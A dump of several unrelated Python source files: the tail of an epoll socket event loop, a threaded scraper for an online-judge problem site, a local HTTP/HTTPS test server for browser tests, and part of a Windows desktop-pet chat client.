buff = b''
# loop read until raise exception
while True:
try:
recv_buff = cur_socket_info['socket'].recv(2048)
buff += recv_buff
# connection disconnected
if not recv_buff:
logger.info('connection disconnected')
if 'disconnected_callback' in self.socket_fileno_info[fd_fileno][
'callback'].keys():
self.socket_fileno_info[fd_fileno]['callback']['disconnected_callback'](
self.socket_fileno_info[fd_fileno]['user_fd'])
self.__remove_socket_fileno_info(fd_fileno)
self.epoll_obj.unregister(fd_fileno)
break
except socket.error as e:
if e.errno == errno.EAGAIN:
logger.info('READ DATA EAGAIN ERROR')
else:
logger.fatal(traceback.format_exc())
break
except Exception as e:
logger.fatal(traceback.format_exc())
break
if recv_buff:
if 'recv_callback' in cur_socket_info['callback'].keys():
# recv callback (user_fd, msg)
cur_socket_info['callback']['recv_callback'](cur_socket_info['user_fd'],
recv_buff.decode('utf-8'))
else:
# put data in msg_queue if no recv_callback
if cur_socket_info['recv_msgq'].full():
cur_socket_info['recv_msgq'].get()
cur_socket_info['recv_msgq'].put((addr, recv_buff.decode('utf-8')))
# Write available
elif event & select.EPOLLOUT:
send_info = None
while self.socket_fileno_info[fd_fileno]['send_msgq'].qsize() > 0:
send_info = self.socket_fileno_info[fd_fileno]['send_msgq'].get()
if send_info == None:
continue
if 'send_callback' in cur_socket_info['callback'].keys():
# send callback (user_fd, msg)
cur_socket_info['callback']['send_callback'](cur_socket_info['user_fd'],
send_info[0])
try:
cur_socket_info['socket'].send(send_info[0].encode('utf-8'))
except Exception as e:
logger.fatal(traceback.format_exc())
# send error, reput the msg to msgq
# lost the msgq if the queue full
if not self.socket_fileno_info[fd_fileno]['send_msgq'].full():
self.socket_fileno_info[fd_fileno]['send_msgq'].put(send_info)
break
# set fd status to read
self.epoll_obj.modify(fd_fileno, select.EPOLLIN)
else:
# reset fd status
self.epoll_obj.modify(fd_fileno, 0)
# udp
elif cur_socket_info['type'] == self.UDP_MODE:
if event & select.EPOLLOUT:
send_info = None
while self.socket_fileno_info[fd_fileno]['send_msgq'].qsize() > 0:
send_info = self.socket_fileno_info[fd_fileno]['send_msgq'].get()
if send_info == None:
continue
ip_port = send_info[1]
if ip_port == None and 'default_target_addr' in cur_socket_info.keys():
ip_port = cur_socket_info['default_target_addr']
if 'send_callback' in cur_socket_info['callback'].keys():
# send callback (user_fd, msg)
cur_socket_info['callback']['send_callback'](cur_socket_info['user_id'], send_info[0])
try:
cur_socket_info['socket'].sendto(send_info[0].encode('utf-8'), ip_port)
except Exception as e:
if e.errno == errno.EAGAIN:
logger.info('WRITE DATA EAGAIN ERROR')
else:
logger.fatal(traceback.format_exc())
# send error, reput the msg to msgq
# lost the msgq if the queue full
if not self.socket_fileno_info[fd_fileno]['send_msgq'].full():
self.socket_fileno_info[fd_fileno]['send_msgq'].put(send_info)
break
# set fd status to read
self.epoll_obj.modify(fd_fileno, select.EPOLLIN)
elif event & select.EPOLLIN:
buff = b''
while True:
try:
recv_buff, addr = cur_socket_info['socket'].recvfrom(2048)
buff += recv_buff
except socket.error as e:
if e.errno == errno.EAGAIN:
logger.info('RECV DATA EAGAIN ERROR')
else:
logger.fatal(traceback.format_exc())
break
except Exception as e:
logger.fatal(traceback.format_exc())
break
if buff:
if 'recv_callback' in cur_socket_info['callback'].keys():
# recv callback (recv_addr, user_fd, msg)
cur_socket_info['callback']['recv_callback'](addr, cur_socket_info['user_fd'],
buff.decode('utf-8'))
else:
# remove oldest data if the msg_queue full
if cur_socket_info['recv_msgq'].full():
cur_socket_info['recv_msgq'].get()
cur_socket_info['recv_msgq'].put((addr, recv_buff.decode('utf-8')))
else:
# reset fd status
self.epoll_obj.modify(fd_fileno, 0)
else:
logger.info('KNOW SOCKET %s' % (cur_socket_info))
logger.info('exit')
|
main.py | from os import path
import requests
import os
import re
import threading
import time
root = os.path.dirname(__file__)
index = []
plist = []
os.chdir(root)
# 函数是个好东西
def write(file: str, text: str):
"""
写一个文件
"""
f = open(os.path.join(root, file), "w", encoding="utf-8")
f.write(text)
f.close()
def read(file: str):
"""
读一个文件
"""
f = open(os.path.join(root, file), "r", encoding="utf-8")
text = f.read()
f.close()
return text
def getpage(url:str):
"""
爬取一页
"""
r = requests.get(url)
r.encoding='utf-8'
return r.text
def getindex():
"""
爬取题目列表
"""
try:
os.mkdir("index")
for i in range(1, 26):
x = getpage(f"http://go.helloworldroom.com:50080/problems?page={i}")
index.append(x)
#x = x.replace("/problem/", os.path.join(root, "problems\\p"))
write(f"index\i{i}.html", x)
except FileExistsError:
for i in os.listdir("index"):
index.append(read(f"index\\{i}"))
def getplist():
"""
解析题目列表
"""
numre = re.compile(r"\d+")
urlre = re.compile(r"/problem/\d+")
for i in index:
for j in urlre.findall(i):
plist.extend(numre.findall(j))
def getall():
"""
爬下所有题目
"""
os.mkdir("problems")
def getone(n):
text = getpage(f"http://go.helloworldroom.com:50080/problem/{n}")
write(f"problems\p{n}.html", text)
pool = []
i = 0
try:
while True:
if len(threading.enumerate()) <= 30:
threading.Thread(target=getone, args=(plist[i] ,)).start()
i += 1
print(i, end="\r")
except IndexError:
pass
def main():
"""
面函数
"""
# 如此简洁
print("爬取页面列表...")
getindex()
print("完成")
print("解析中...")
getplist()
print(f"共解析到{len(plist)}个题目,开始爬取!")
getall()
print("完成!")
time.sleep(1)
# 面函数
main() |
server.py | # Copyright (c) Microsoft Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import asyncio
import gzip
import mimetypes
import socket
import threading
from contextlib import closing
from http import HTTPStatus
from OpenSSL import crypto
from twisted.internet import reactor, ssl
from twisted.web import http
from playwright.path_utils import get_file_dirname
_dirname = get_file_dirname()
def _find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
class Server:
protocol = "http"
def __init__(self):
self.PORT = _find_free_port()
self.EMPTY_PAGE = f"{self.protocol}://localhost:{self.PORT}/empty.html"
self.PREFIX = f"{self.protocol}://localhost:{self.PORT}"
self.CROSS_PROCESS_PREFIX = f"{self.protocol}://127.0.0.1:{self.PORT}"
# On Windows, this list can be empty, reporting text/plain for scripts.
mimetypes.add_type("text/html", ".html")
mimetypes.add_type("text/css", ".css")
mimetypes.add_type("application/javascript", ".js")
mimetypes.add_type("image/png", ".png")
mimetypes.add_type("font/woff2", ".woff2")
def __repr__(self) -> str:
return self.PREFIX
@abc.abstractmethod
def listen(self, factory):
pass
def start(self):
request_subscribers = {}
auth = {}
csp = {}
routes = {}
gzip_routes = set()
self.request_subscribers = request_subscribers
self.auth = auth
self.csp = csp
self.routes = routes
self.gzip_routes = gzip_routes
static_path = _dirname / "assets"
class TestServerHTTPHandler(http.Request):
def process(self):
request = self
self.post_body = request.content.read().decode()
request.content.seek(0, 0)
uri = request.uri.decode()
if request_subscribers.get(uri):
request_subscribers[uri].set_result(request)
request_subscribers.pop(uri)
if auth.get(uri):
authorization_header = request.requestHeaders.getRawHeaders(
"authorization"
)
creds_correct = False
if authorization_header:
creds_correct = auth.get(uri) == (
request.getUser(),
request.getPassword(),
)
if not creds_correct:
request.setHeader(
b"www-authenticate", 'Basic realm="Secure Area"'
)
request.setResponseCode(HTTPStatus.UNAUTHORIZED)
request.finish()
return
if csp.get(uri):
request.setHeader(b"Content-Security-Policy", csp[uri])
if routes.get(uri):
routes[uri](request)
return
file_content = None
try:
file_content = (
static_path / request.path.decode()[1:]
).read_bytes()
except (FileNotFoundError, IsADirectoryError):
request.setResponseCode(HTTPStatus.NOT_FOUND)
if file_content:
request.setHeader("Content-Type", mimetypes.guess_type(uri)[0])
if uri in gzip_routes:
request.setHeader("Content-Encoding", "gzip")
request.write(gzip.compress(file_content))
else:
request.write(file_content)
self.setResponseCode(HTTPStatus.OK)
self.finish()
class MyHttp(http.HTTPChannel):
requestFactory = TestServerHTTPHandler
class MyHttpFactory(http.HTTPFactory):
protocol = MyHttp
self.listen(MyHttpFactory())
async def wait_for_request(self, path):
if path in self.request_subscribers:
return await self.request_subscribers[path]
future = asyncio.Future()
self.request_subscribers[path] = future
return await future
def set_auth(self, path: str, username: str, password: str):
self.auth[path] = (username, password)
def set_csp(self, path: str, value: str):
self.csp[path] = value
def reset(self):
self.request_subscribers.clear()
self.auth.clear()
self.csp.clear()
self.gzip_routes.clear()
self.routes.clear()
def set_route(self, path, callback):
self.routes[path] = callback
def enable_gzip(self, path):
self.gzip_routes.add(path)
def set_redirect(self, from_, to):
def handle_redirect(request):
request.setResponseCode(HTTPStatus.FOUND)
request.setHeader("location", to)
request.finish()
self.set_route(from_, handle_redirect)
class HTTPServer(Server):
def listen(self, factory):
reactor.listenTCP(self.PORT, factory)
class HTTPSServer(Server):
protocol = "https"
def listen(self, factory):
cert = ssl.PrivateCertificate.fromCertificateAndKeyPair(
ssl.Certificate.loadPEM(
(_dirname / "testserver" / "cert.pem").read_bytes()
),
ssl.KeyPair.load(
(_dirname / "testserver" / "key.pem").read_bytes(), crypto.FILETYPE_PEM
),
)
contextFactory = cert.options()
reactor.listenSSL(self.PORT, factory, contextFactory)
class TestServer:
def __init__(self) -> None:
self.server = HTTPServer()
self.https_server = HTTPSServer()
def start(self) -> None:
self.server.start()
self.https_server.start()
self.thread = threading.Thread(
target=lambda: reactor.run(installSignalHandlers=0)
)
self.thread.start()
def stop(self) -> None:
reactor.stop()
self.thread.join()
def reset(self) -> None:
self.server.reset()
self.https_server.reset()
test_server = TestServer()
|
image_window.pyw | # example1.py
import os
from synchronizationRole import updataIfNeed
import zipfile
import struct
import win32api
import win32con
import win32gui
import threading
import Image
import time
import socket
import online_check as oc
import tkinter as tk
import message_transaction as mt
import tkinter.messagebox as tkmb
from WM_APP_MESSAGES import *
from win32api import RGB
import queue
from tkinter import Entry
import myPacket as mp
import elfAutoBehavior
import mailHandle
from winsound import PlaySound, SND_ASYNC
from random import randint
config_file="config"
history_file="history"
#execute once
className = "image_window"
wc = win32gui.WNDCLASS()
wc.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW
wc.lpfnWndProc = win32gui.DefWindowProc
wc.cbWndExtra = 0
wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.hIcon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
wc.lpszClassName = className
wc.cbWndExtra = win32con.DLGWINDOWEXTRA +struct.calcsize("Pi")
# wc.hIconSm = 0
win32gui.RegisterClass(wc)
def getXY(lparam):
return lparam&0xffff, (lparam>>16)&0xffff
def turnOffTk(tk_object):
tk_object.destroy()
'''def getCharacter(fileName):
charFile = open(fileName, 'r')
charData=[]
for line in charFile.readlines():
charData.append(line.split())
charFile.close()
return charData'''
def getCharacter(fileName):
charFile = open(fileName, 'r')
charData=[]
for line in charFile.readlines():
temp = line.split()
temp[0] = os.path.abspath(os.path.join(fileName, os.pardir))+'/'+temp[0]
charData.append(temp)
charFile.close()
return charData
class image_window:
'''
modify .message_map to handle messages
init is the constructor
stuck in run() and released after closed
SetImages() to set a list of paths
SwitchNextImage() let you switch to next image
TODO
sending message
allowing multiline message
preview anime
'''
def __init__(self, after_window_close, friend_name, sock, ip, characterFile, id):
'''
sock maybe None, indicates the window is not connected currently.
'''
win32gui.InitCommonControls()
self.hinst = win32api.GetModuleHandle(None)
'''for show action easy to draw'''
self.image_index = 0
'''for show action easy to draw'''
self.friendID = id
self.Image_list = []
self.message_map = {
win32con.WM_DESTROY: self.OnDestroy,
win32con.WM_LBUTTONDOWN: self.OnLButtonDown,
win32con.WM_LBUTTONUP: self.OnLButtonUp,
win32con.WM_MOVE: self.OnMove,
win32con.WM_SIZE:self.OnSize,
win32con.WM_MOUSEMOVE: self.OnMouseMove,
win32con.WM_PAINT: self.OnPaint,
win32con.WM_RBUTTONUP: self.OnRButtonUp,
WM_CHATMSGRECV: self.OnChatMessageReceived,
}
'''create the window '''
self.BuildWindow("image_window")
'''set the message mapping '''
win32gui.SetWindowLong(self.hwnd, win32con.GWL_WNDPROC, self.message_map)
'''read the configurations from file'''
try:
self.readCheck=False
self.autoBehave = False
self.myCharFile = 'data/character1/character1.txt'
self.ReadConfig()
except Exception:
print('no config file')
'''whether chatter is online'''
self.online = False
'''whether the drag action is showing'''
self.drag_showing = False
'''whether character is being dragged'''
self.dragging = False
'''history'''
self.this_messages=[]
'''for display'''
self.chat_name = friend_name
''''speak window'''
self.speak_window = None
'''speak window'''
self.speak_window_hwnd = 0
'''name window'''
self.name_win = None
self.ShowNameWin()
self.history_window_width = 30 # in character
'''callback function to be execute in ondestroy'''
self.after = after_window_close
'''for socket connection'''
self.ip = ip
'''the socket , whether connected or not'''
self.conn_socket = None
'''the character file (path of bitmaps)'''
self.charFile = characterFile
'''the chat msg queue for thread to insert into
and for main thread to get from'''
self.chatmsg_queue = queue.Queue()
'''the chat msg window showing'''
self.chat_msg_win = []
'''offline Message string'''
self.cht_str_msg = ''
'''the sent msg window showing'''
self.sent_msg_win = None
print('the path input image_window get: ',self.getActionPath('idle.txt'))
self.showAction(self.getActionPath('idle.txt'), True)
'''for read cheack'''
self.actionNow = None
actionList = self.getAutoBehaviorActions()
self.elfAutoBehaviorThread = elfAutoBehavior.ElfAutoBehavior(self, actionList)
self.elfAutoBehaviorThread.setDaemon(True)
self.elfAutoBehaviorThread.start()
self.receive_message_read = True #no not yet read received message
self.sended_message_read = True #he/she already read message
if sock != None:
self.setConnectedSocket(sock)
'''for selecting the anime to send'''
self.tmp_anime=""
def getAutoBehaviorActions(self):
path = self.getParentDirectory(self.charFile) + '/skeleton/'
anime_list = [f for f in os.listdir(path) if os.path.splitext(f)[1]=='.txt']
with open(path+'autoBehave.config') as file:
accept_list = [line[:-1] for line in file]
result_list = ['walk.txt']
for anime in anime_list:
if accept_list.count(anime) > 0:
result_list.append(anime)
return result_list
def setConnectedSocket(self, sock, is_connectee=True):
print('set connected socket', sock.getpeername())
if self.conn_socket != None:
try:
mt.SendChatEndMessage(self.conn_socket)
except:pass
self.conn_socket.close()
self.conn_socket = sock
# raise Exception('set socket when connected')
self.conn_socket = sock
if is_connectee:
mp.sendPacket(self.conn_socket, b'ok')
else:
assert mp.recvPacket(self.conn_socket) == b'ok'
self.DoAfterConnectEstablished()
def DoAfterConnectEstablished(self):
thread = threading.Thread(target=self.listen_to_chat_messagesInThread)
thread.setDaemon(True)
thread.start()
def ReadConfig(self):
with open(config_file) as file:
for line in file:
if line[-1] == '\n':
line = line[:-1]
cap = line.split(":")
if cap[0] == 'readCheck':
self.readCheck=bool(cap[1]=='True')
elif cap[0] == 'myCharFile':
self.myCharFile = cap[1]
elif cap[0] == 'autoBehave':
self.autoBehave = (cap[1]=='True')
def BuildWindow(self, className):
style = win32con.WS_POPUP|win32con.WS_VISIBLE
xstyle = win32con.WS_EX_LAYERED
self.hwnd = win32gui.CreateWindowEx(
xstyle,
className,
"image_window",
style,
randint(200,800),
randint(200,500),
130,
130,
0,
0,
self.hinst,
None)
win32gui.SetLayeredWindowAttributes(self.hwnd, RGB(255,255,255),0,win32con.LWA_COLORKEY)
self.StayTop()
def SetImages(self, Image_list):
'''private purpose, for showing action implementation'''
try:
for image in self.Image_list:
image.release_img()
except:pass
self.Image_list = Image_list
self.image_index = -1
def SwitchNextImage(self):
'''private purpose, for showing action implementation
maybe call Resize here'''
self.image_index = (self.image_index+1)%len(self.Image_list)
#redrawing
win32gui.InvalidateRect(self.hwnd, None, True)
def GetCurrentImageRemainTime(self):
return self.image_remain_times[self.image_index]
def MoveTo(self, x, y):
win32gui.SetWindowPos(self.hwnd, 0, x, y, 0, 0, win32con.SWP_NOSIZE|win32con.SWP_NOOWNERZORDER)
def GoOnTop(self):
win32gui.SetWindowPos(self.hwnd, win32con.HWND_TOP, 0, 0, 0, 0, win32con.SWP_NOMOVE|win32con.SWP_NOSIZE)
def StayTop(self):
win32gui.SetWindowPos(self.hwnd, win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE|win32con.SWP_NOSIZE)
def Resize(self, w, h):
win32gui.SetWindowPos(self.hwnd, 0, 0, 0, w, h, win32con.SWP_NOMOVE|win32con.SWP_NOOWNERZORDER)
def OnNCCreate(self, hwnd, message, wparam, lparam):
'''
DO NOT edit unless you know what you're doing
'''
return True
def OnLButtonDown(self, hwnd, message, wparam, lparam):
self.dragging = True
self.drag_point = win32gui.ClientToScreen(self.hwnd, (win32api.LOWORD(lparam), win32api.HIWORD(lparam)))
self.drag_pre_pos = win32gui.ClientToScreen(self.hwnd, (0,0))
win32gui.SetCapture(hwnd)
return True
def OnLButtonUp(self, hwnd, message, wparam, lparam):
'''2.Click on image_window so send i read the message'''
if self.receive_message_read == False: #if there are messages not read, now is reading
if self.readCheck == True:
mt.SendMessageAndAnime(self.conn_socket, '', 'checked') # tell I read it
self.receive_message_read=True #no message not read
self.DestroyChatMsgWins()
if self.drag_showing == False:
self.showAction(self.getActionPath('click.txt'))
else:
self.showAction(self.getActionPath('idle.txt'))
self.dragging = False
self.drag_showing = False
win32gui.ReleaseCapture()
'''set other attaced windows' position, if put this in OnMove(), cause vanishing'''
self.SetAttachedWinPos()
return True
def OnMouseMove(self, hwnd, message, wparam, lparam):
if self.dragging :
cur_x, cur_y = win32gui.ClientToScreen(self.hwnd, (win32api.LOWORD(lparam), win32api.HIWORD(lparam)))
'''deal for negative cur_x, cur_y'''
if cur_x > (1<<15)-1:
cur_x -= (1<<16)
if cur_y > (1<<15)-1:
cur_y -= (1<<16)
dx = cur_x-self.drag_point[0]
dy = cur_y-self.drag_point[1]
if abs(dx)+abs(dy) < 1:
return True
self.drag_point = (cur_x, cur_y)
if not self.drag_showing:
self.drag_showing = True
self.showAction(self.getActionPath('drag.txt'), True)
rect = win32gui.GetWindowRect(self.hwnd)
x, y = rect[0], rect[1]
self.MoveTo(x+dx, y+dy)
return True
def OnRButtonUp(self, hwnd, message, wparam, lparam):
menu = win32gui.CreatePopupMenu()
win32gui.AppendMenu(menu, win32con.MF_STRING, 1, 'speak')
win32gui.AppendMenu(menu, win32con.MF_STRING, 2, 'read check')
win32gui.AppendMenu(menu, win32con.MF_STRING, 3, 'historical messages')
win32gui.AppendMenu(menu, win32con.MF_STRING, 5, 'auto behave')
win32gui.AppendMenu(menu, win32con.MF_STRING, 4, 'close')
if self.readCheck == True: #check new menu's mark
win32gui.CheckMenuItem(menu, 2, win32con.MF_CHECKED)
if self.autoBehave == True:
win32gui.CheckMenuItem(menu, 5, win32con.MF_CHECKED)
x, y = getXY(lparam)
x, y = win32gui.ClientToScreen(hwnd, (x, y))
'''show the popup menu, 0x100 means return item id right after'''
item_id = win32gui.TrackPopupMenu(menu, 0x100, x, y, 0, hwnd, None)
if item_id == 1:
try:
turnOffTk(self.speak_window)
self.speak_window = None
self.speak_window_hwnd = 0
except Exception:
self.ShowSpeakWindow()
elif item_id == 2:
self.readCheck=not self.readCheck
elif item_id == 3:
try:
turnOffTk(self.history_window)
self.history_window = None
except Exception:
self.ShowHistoryWindow()
elif item_id == 4:
win32gui.DestroyWindow(self.hwnd)
elif item_id == 5:
self.autoBehave = not self.autoBehave
win32gui.DestroyMenu(menu)
return True
def OnMove(self, hwnd, message, wparam, lparam):
'''
called when window is moved.
control things here
'''
if not self.dragging:
self.SetAttachedWinPos()
return win32gui.DefWindowProc(hwnd, message, wparam, lparam)
def OnSize(self, hwnd, message, wparam, lparam):
'''
called when window is resized.
control things here
'''
self.SetAttachedWinPos()
return win32gui.DefWindowProc(hwnd, message, wparam, lparam)
def SetAttachedWinPos(self):
try:self.speak_window.geometry('+%d+%d' % self.GetSpeakWindowPos())
except :pass
for i in range(len(self.chat_msg_win)):
try:self.chat_msg_win[i].geometry('%dx%d+%d+%d' % self.GetChatMsgWinSizePos(i))
except :pass
try:self.sent_msg_win.geometry('%dx%d+%d+%d' % self.GetSentMsgWinSizePos())
except :pass
try:
self.name_win.geometry('+%d+%d'%self.GetNameWinPos())
except :pass
def GetNameWinPos(self):
'''control the position of speaking window'''
x = (win32gui.GetWindowRect(self.hwnd)[0]+win32gui.GetWindowRect(self.hwnd)[2])//2\
- len(self.chat_name)*5
y = win32gui.GetWindowRect(self.hwnd)[3]
if self.speak_window != None:
y += 50
return x,y
def GetSpeakWindowPos(self):
'''control the position of speaking window'''
x = win32gui.GetWindowRect(self.hwnd)[0]
y = win32gui.GetWindowRect(self.hwnd)[3]
return x,y
def ShowSpeakWindow(self):
'''
show the speaking window.
this function does not close it even if it's shown.
'''
self.speak_window = tk.Tk()
self.speak_window.overrideredirect(True)
self.speak_window.wm_attributes('-alpha',1,'-disabled',False,'-toolwindow',True, '-topmost', True)
frame = tk.Frame(self.speak_window)
self.input_text = tk.Entry(frame)
self.input_text.pack(side='left',expand=True, fill='both')
self.input_text.bind('<Return>', func=self.InputTextHitReturn)
send_btn = tk.Button(frame, text='send', command=self.SendText)
send_btn.pack(side='right')
anime_btn = tk.Button(frame, text='anime', command=self.SelectAnime)
anime_btn.pack(side='right')
frame.pack()
self.input_text.focus()
self.speak_window.geometry('+%d+%d' % self.GetSpeakWindowPos())
self.speak_window_hwnd = win32gui.GetForegroundWindow()
win32gui.SetFocus(self.speak_window_hwnd)
self.SetAttachedWinPos()
def ShowNameWin(self):
'''show msg in a new bubble window'''
r = tk.Toplevel()
r.overrideredirect(True)
f = tk.Frame(r, bd=1,bg='black')
var = tk.StringVar()
l = tk.Label(f,bg='#bbffdd', justify='center', fg='black', font=('Consolas', 17),textvariable=var)
var.set(self.chat_name)
l.pack(fill='both',expand=True)
f.pack(fill='both',expand=True)
r.wm_attributes('-toolwindow',True, '-topmost', True)
r.geometry('+%d+%d'%self.GetNameWinPos())
self.name_win = r
def ShowNewChatMsgWin(self, msg):
'''show msg in a new bubble window'''
r = tk.Toplevel()
r.overrideredirect(True)
f = tk.Frame(r, bd=1,bg='black')
var = tk.StringVar()
l = tk.Label(f,bg='#bbddff', justify='center', fg='black', textvariable=var)
var.set(msg)
l.pack(fill='both',expand=True)
f.pack(fill='both',expand=True)
r.wm_attributes('-toolwindow',True, '-topmost', True)
#r.geometry('%dx%d+%d+%d'%self.GetNewChatMsgWinSizePos())
self.chat_msg_win.append(r)
self.SetAttachedWinPos()
def showSentChatMsgWin(self, msg):
r = tk.Toplevel()
r.overrideredirect(True)
f = tk.Frame(r, bd=1,bg='black')
var = tk.StringVar()
l = tk.Label(f,bg='#bbddff', justify='center', fg='black', textvariable=var)
var.set(msg)
l.pack(fill='both',expand=True)
f.pack(fill='both',expand=True)
r.wm_attributes('-toolwindow',True, '-topmost', True)
r.geometry('%dx%d+%d+%d'%self.GetSentMsgWinSizePos())
try:
self.sent_msg_win.destroy()
except:pass
self.sent_msg_win = r
def InputTextHitReturn(self, event):
self.SendText()
def GetChatMsgWinSizePos(self, index):
'''control the position of new chat msg'''
w = 200
h = 32
y_dis = 7
x = win32gui.GetWindowRect(self.hwnd)[0]
y = win32gui.GetWindowRect(self.hwnd)[1] - (y_dis+h)*(len(self.chat_msg_win) - index)
return w,h,x,y
def GetSentMsgWinSizePos(self):
w = 250
h = 32
y_dis = 7
x_dis = 10
rect = win32gui.GetWindowRect(self.hwnd)
x = rect[2] + x_dis
y = (rect[3]+rect[1])//2
return w,h,x,y
def GetNewChatMsgWinSizePos(self):
return self.GetChatMsgWinSizePos(len(self.chat_msg_win))
def GetHistoryWindowPos(self):
'''control the position of history window'''
return win32gui.GetCursorPos()
def GetHistoryString(self):
'''
read history file and make it pretty
return a pretty string for history window display
'''
s = ''
try:
with open('data/'+str(self.friendID)+'/'+history_file) as file:
for line in file.read().splitlines():
s += line+'\n'
except Exception:pass
for i in range(self.history_window_width):
s += '-'
s += '\n'
for msg in self.this_messages:
s += msg+'\n'
return s
def ShowHistoryWindow(self):
'''
set self.history_window a tk loop
'''
'''the window'''
self.history_window = tk.Tk()
self.history_window.wm_attributes('-toolwindow',True)
self.history_window.resizable(width=False, height=False)
self.history_window.title('[%s] %s' % ('HISTORY', self.chat_name))
'''the history text'''
text = tk.Text(self.history_window,
exportselection=0,
width=self.history_window_width,
height=10)
text.insert(tk.END, self.GetHistoryString())
text.config(state=tk.DISABLED)
text.pack(side='left',fill='y')
'''create scrollbar'''
scrollbar = tk.Scrollbar(self.history_window)
scrollbar.pack(side='right', fill='y')
'''enable scrolling'''
text.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=text.yview)
'''set position and size, and then show it'''
self.history_window.geometry('+%d+%d' % self.GetHistoryWindowPos())
def SelectAnime(self):
'''
show anime list for user to choose, or hide it if it was shown.
TODO: change name to OnSelectShowAnime.
'''
if hasattr(self, 'anime_lb') and self.anime_lb != None :
self.anime_lb.destroy()
self.anime_lb = None
self.tmp_anime = ''
else:
anime_list = self.getSelfActionList()
self.anime_lb = tk.Listbox(self.speak_window, height = len(anime_list))
self.anime_lb.bind("<<ListboxSelect>>", self.OnSelect)
for i in range(len(anime_list)):
self.anime_lb.insert(i+1, anime_list[i])
self.anime_lb.pack(expand=True, fill='both')
def OnSelect(self, event):
widget = event.widget
selection=widget.curselection()
value = widget.get(selection[0])
self.tmp_anime = value
def set_cht_str_msg(self):
msg = self.input_text.get()
self.input_text.delete(0, tk.END)
self.cht_str_msg += msg + '\n'
def SendText(self):
'''
SendText to remote chatter
'''
'''get the speak_window handle'''
self.speak_window_hwnd = win32gui.GetForegroundWindow()
if self.conn_socket == None:
if self.online == True:
print('try connect to', self.ip)
self.conn_socket = mt.StartTalking(self.ip)
print('result:', self.conn_socket)
if self.conn_socket == None:
self.set_cht_str_msg()
return
myThread = threading.Thread(target=self.sendVersionAndUpdata)
myThread.setDaemon(True)
myThread.start()
assert mp.recvPacket(self.conn_socket) == b'ok'
self.DoAfterConnectEstablished()
msg = self.input_text.get()
msg = msg.replace('\n', '')
msg = msg.replace('\r', '')
mt.SendMessageAndAnime(self.conn_socket, msg, self.tmp_anime)
self.this_messages.append('you: '+msg)
'''1.send new message so readCheck set to False'''
self.sended_message_read = False #no need but on logical
if msg != '':
self.showSentChatMsgWin(msg)
self.showAction(self.getActionPath('send.txt'))
self.input_text.delete(0, tk.END)
win32gui.SetFocus(self.speak_window_hwnd)
def OnPaint(self, hwnd, message, wparam, lparam):
dc,ps = win32gui.BeginPaint(hwnd)
if len(self.Image_list)>0:
self.Image_list[self.image_index].draw_on_dc(dc, RGB(255,255,255))
win32gui.EndPaint(hwnd, ps)
return True
def DestroyChatMsgWins(self):
for win in self.chat_msg_win:
try:turnOffTk(win)
except :pass
self.chat_msg_win = []
def OnDestroy(self, hwnd, message, wparam, lparam):
'''
clean things here
kill all tk things here
'''
self.elfAutoBehaviorThread.stop = True
with open(config_file, 'w') as file:
file.write('readCheck:'+str(self.readCheck)+'\n')
file.write('myCharFile:'+str(self.myCharFile)+'\n')
file.write('autoBehave:'+str(self.autoBehave)+'\n')
with open('data/'+str(self.friendID)+'/'+history_file, 'a') as file:
for each in self.this_messages:
file.write(each+'\n')
try:turnOffTk(self.speak_window)
except :pass
try:turnOffTk(self.history_window)
except :pass
self.DestroyChatMsgWins()
try:turnOffTk(self.sent_msg_win)
except:pass
try:turnOffTk(self.name_win)
except:pass
if self.conn_socket != None:
mt.SendChatEndMessage(self.conn_socket)
self.conn_socket.close()
self.conn_socket = None
self.after(self)
return True
def getFileFromPath(self, path):
names=[]
temp = path.split('\\')
for i in temp:
names += i.split('/')
return names[len(names)-1]
def getCharFile(self):
return self.charFile
def showAction(self, skelFile, repeating = False, acting=True):
'''
show an action
the acting parameter should not be used by public user.
'''
skelData=[]
charFile = open(skelFile, 'r')
for line in charFile.readlines():
skelData.append(line.split())
charFile.close()
self.image_remain_times = []
with open(skelFile+'.config') as file:
x_size, y_size = [int(v) for v in file.readline().split()]
for line in file:
self.image_remain_times.append(float(line))
charData = getCharacter(self.getCharFile())
self.Resize(x_size, y_size)
charData = sorted(charData,key= lambda temp:int(temp[2]))
img=[]
skelTypes = 7
for i in range(int(len(skelData)/skelTypes)):
imgTemp = Image.Image()
temp = skelData[i*skelTypes]
charDataChange=[]
if int(temp[5]) != 0:
for skin in charData:
temp = skelData[i*skelTypes + int(skin[1])-1]
skin[2] = temp[5]
charDataChange.append(skin)
charDataChange = sorted(charDataChange,key= lambda temp:int(temp[2]))
else:
charDataChange = charData
for skin in charDataChange:
temp = skelData[i*skelTypes + int(skin[1])-1]
skinTemp = skin[0]
if int(temp[4]) != 0:
skinTemp, st= skinTemp.split('.', 1)
skinTemp = skinTemp + '_' + temp[4] + '.bmp'
hbmp2 = win32gui.LoadImage(0, skinTemp, win32gui.IMAGE_BITMAP, 0, 0,win32gui.LR_LOADFROMFILE)
imgTemp.append_component(hbmp2, int(temp[0]), int(temp[1]), int(temp[2]), int(temp[3]))
img.append(imgTemp)
self.SetImages(img)
self.actionNow = self.getFileFromPath(skelFile)
if acting:
self.actionThread = ChangeImageThread(self, repeating)
self.actionThread.setDaemon(True)
self.actionThread.start()
else:
self.actionThread = None
def showCharacter(self, skelFile):
'''
show a animation with only one action
'''
self.showAction(skelFile, False)
def listen_to_chat_messagesInThread(self):
'''
pre porcess messages in this function
maybe unpack your message here
(if it was packed to ensure the completeness)
'''
print('begin recving')
while True:
try:
msg, anime = mt.RecvMessageAndAnime(self.conn_socket)
if mt.IsChatEndMessage(msg, anime):
'''rcev chat close request, maybe show some anime here'''
raise Exception('chat closed by remote')
